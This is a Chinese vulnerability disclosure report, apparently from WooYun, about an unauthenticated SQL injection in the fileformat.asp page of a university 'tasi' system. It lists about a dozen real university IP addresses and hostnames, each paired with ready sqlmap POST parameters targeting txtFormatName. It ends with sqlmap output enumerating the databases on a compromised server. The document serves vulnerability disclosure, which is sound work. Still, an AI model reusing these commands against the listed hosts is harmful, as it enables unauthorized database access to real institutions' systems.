### 简要描述:
~
### 详细说明:
[WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2](http://www.wooyun.org/bugs/wooyun-2015-0101213)
上一个
注入文件fileformat.asp 参数txtFormatName
案例
202.195.243.37/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.120.121.200/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
pss.uestc.edu.cn/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.203.222.222/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
218.242.146.229/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.193.70.164/TASi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.120.227.60/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
59.72.151.17:8000/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.197.127.125/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
218.199.187.117:8080/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
202.119.83.2/apatasi30/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
218.242.146.229/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName
前两个丢进sqlmap
[<img src="https://images.seebug.org/upload/201504/04183413f280aaacfda3792d302b7b0adebf6c51.png" alt="屏幕截图(1108).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04183413f280aaacfda3792d302b7b0adebf6c51.png)
[<img src="https://images.seebug.org/upload/201504/04183422dd06c689154a3178416cf84ba7e09b12.png" alt="屏幕截图(1109).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04183422dd06c689154a3178416cf84ba7e09b12.png)
[<img src="https://images.seebug.org/upload/201504/04183431029b9bd4c7ee4897eacded4e54719eae.png" alt="屏幕截图(1110).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04183431029b9bd4c7ee4897eacded4e54719eae.png)
[<img src="https://images.seebug.org/upload/201504/04183440855a4244dc7e7e188f035e3f4a79c5c7.png" alt="屏幕截图(1111).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04183440855a4244dc7e7e188f035e3f4a79c5c7.png)
### 漏洞证明:
available databases [5]:
[*] ApabiTasi_400_1
[*] master
[*] model
[*] msdb
[*] tempdb
暂无评论